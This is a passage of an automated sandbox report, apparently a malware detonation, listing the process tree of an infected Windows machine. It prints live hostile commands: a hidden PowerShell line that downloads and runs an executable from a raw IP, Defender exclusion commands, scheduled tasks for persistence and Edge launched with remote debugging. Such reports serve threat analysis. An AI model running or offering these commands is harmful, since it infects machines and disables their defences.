                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,13928755109970674369,3807153889931469808,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
                                                                          7⤵
                                                                            PID:3328
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,13928755109970674369,3807153889931469808,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
                                                                            7⤵
                                                                              PID:1496
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13928755109970674369,3807153889931469808,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3080 /prefetch:2
                                                                              7⤵
                                                                                PID:4500
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2236,13928755109970674369,3807153889931469808,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
                                                                                7⤵
                                                                                • Uses browser remote debugging
                                                                                PID:4456
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2236,13928755109970674369,3807153889931469808,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
                                                                                7⤵
                                                                                • Uses browser remote debugging
                                                                                PID:4280
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13928755109970674369,3807153889931469808,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2560 /prefetch:2
                                                                                7⤵
                                                                                  PID:5024
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13928755109970674369,3807153889931469808,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2756 /prefetch:2
                                                                                  7⤵
                                                                                    PID:5308
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13928755109970674369,3807153889931469808,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3224 /prefetch:2
                                                                                    7⤵
                                                                                      PID:5300
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13928755109970674369,3807153889931469808,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3628 /prefetch:2
                                                                                      7⤵
                                                                                        PID:4264
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13928755109970674369,3807153889931469808,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3176 /prefetch:2
                                                                                        7⤵
                                                                                          PID:5360
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13928755109970674369,3807153889931469808,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3776 /prefetch:2
                                                                                          7⤵
                                                                                            PID:5172
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13928755109970674369,3807153889931469808,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3596 /prefetch:2
                                                                                            7⤵
                                                                                              PID:5380
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                            6⤵
                                                                                            • Uses browser remote debugging
                                                                                            • Enumerates system info in registry
                                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                            PID:1724
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffa5d5446f8,0x7ffa5d544708,0x7ffa5d544718
                                                                                              7⤵
                                                                                                PID:5252
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2376,8229658605028260239,397330449345652647,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2388 /prefetch:2
                                                                                                7⤵
                                                                                                  PID:6412
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2376,8229658605028260239,397330449345652647,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 /prefetch:3
                                                                                                  7⤵
                                                                                                    PID:6556
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2376,8229658605028260239,397330449345652647,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:8
                                                                                                    7⤵
                                                                                                      PID:6592
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2376,8229658605028260239,397330449345652647,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3080 /prefetch:2
                                                                                                      7⤵
                                                                                                        PID:7140
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2376,8229658605028260239,397330449345652647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
                                                                                                        7⤵
                                                                                                        • Uses browser remote debugging
                                                                                                        PID:7116
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2376,8229658605028260239,397330449345652647,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
                                                                                                        7⤵
                                                                                                        • Uses browser remote debugging
                                                                                                        PID:2140
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2376,8229658605028260239,397330449345652647,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3076 /prefetch:2
                                                                                                        7⤵
                                                                                                          PID:2352
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2376,8229658605028260239,397330449345652647,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2976 /prefetch:2
                                                                                                          7⤵
                                                                                                            PID:6644
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2376,8229658605028260239,397330449345652647,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3436 /prefetch:2
                                                                                                            7⤵
                                                                                                              PID:540
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2376,8229658605028260239,397330449345652647,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2860 /prefetch:2
                                                                                                              7⤵
                                                                                                                PID:6352
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2376,8229658605028260239,397330449345652647,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2720 /prefetch:2
                                                                                                                7⤵
                                                                                                                  PID:6848
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2376,8229658605028260239,397330449345652647,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1
                                                                                                                  7⤵
                                                                                                                  • Uses browser remote debugging
                                                                                                                  PID:6320
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2376,8229658605028260239,397330449345652647,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4632 /prefetch:2
                                                                                                                  7⤵
                                                                                                                    PID:7076
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2376,8229658605028260239,397330449345652647,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4596 /prefetch:1
                                                                                                                    7⤵
                                                                                                                    • Uses browser remote debugging
                                                                                                                    PID:7052
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1075844001\WveK4j1.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1075844001\WveK4j1.exe"
                                                                                                                5⤵
                                                                                                                • Downloads MZ/PE file
                                                                                                                • Checks computer location settings
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3720
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c cls
                                                                                                                  6⤵
                                                                                                                    PID:4296
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c cls
                                                                                                                    6⤵
                                                                                                                      PID:2800
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c cls
                                                                                                                      6⤵
                                                                                                                        PID:2628
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                                                                        6⤵
                                                                                                                          PID:1816
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                                                                          6⤵
                                                                                                                            PID:4056
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                                                                            6⤵
                                                                                                                              PID:3992
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                                                                              6⤵
                                                                                                                                PID:1516
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c cls
                                                                                                                                6⤵
                                                                                                                                  PID:4476
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c cls
                                                                                                                                  6⤵
                                                                                                                                    PID:1060
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c cls
                                                                                                                                    6⤵
                                                                                                                                      PID:3980
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c cls
                                                                                                                                      6⤵
                                                                                                                                        PID:2160
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                                                                                        6⤵
                                                                                                                                          PID:1560
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                                                                                          6⤵
                                                                                                                                            PID:468
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                                                                                            6⤵
                                                                                                                                              PID:4264
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                                                                                              6⤵
                                                                                                                                                PID:4424
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                6⤵
                                                                                                                                                  PID:4704
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ZHIEL'"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:5884
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ZHIEL'"
                                                                                                                                                      7⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      PID:5832
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:3508
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                                                                                                                        7⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        PID:5352
                                                                                                                                                    • C:\ZHIEL\mmytljldrgl.exe
                                                                                                                                                      "C:\ZHIEL\mmytljldrgl.exe"
                                                                                                                                                      6⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:2956
                                                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                        "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                        7⤵
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:4332
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                                                                        7⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:5392
                                                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                          "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                          8⤵
                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                          PID:2232
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1075845001\ViGgA8C.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1075845001\ViGgA8C.exe"
                                                                                                                                                    5⤵
                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:5412
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1075846001\720bcda108.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1075846001\720bcda108.exe"
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                    PID:6136
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c schtasks /create /tn DmOyRmalmTB /tr "mshta C:\Users\Admin\AppData\Local\Temp\f0X8Rv8rM.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                      6⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:5200
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /create /tn DmOyRmalmTB /tr "mshta C:\Users\Admin\AppData\Local\Temp\f0X8Rv8rM.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                        7⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:5340
                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                      mshta C:\Users\Admin\AppData\Local\Temp\f0X8Rv8rM.hta
                                                                                                                                                      6⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:5208
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IWF7DDIB5FQ6DQ5X5YXCERH0YTHGZKKB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                                                                                                                                        7⤵
                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        • Downloads MZ/PE file
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:5408
                                                                                                                                                        • C:\Users\Admin\AppData\Local\TempIWF7DDIB5FQ6DQ5X5YXCERH0YTHGZKKB.EXE
                                                                                                                                                          "C:\Users\Admin\AppData\Local\TempIWF7DDIB5FQ6DQ5X5YXCERH0YTHGZKKB.EXE"
                                                                                                                                                          8⤵
                                                                                                                                                          • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                          • Modifies Windows Defender TamperProtection settings
                                                                                                                                                          • Modifies Windows Defender notification settings
                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                          • Windows security modification
                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:2080
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
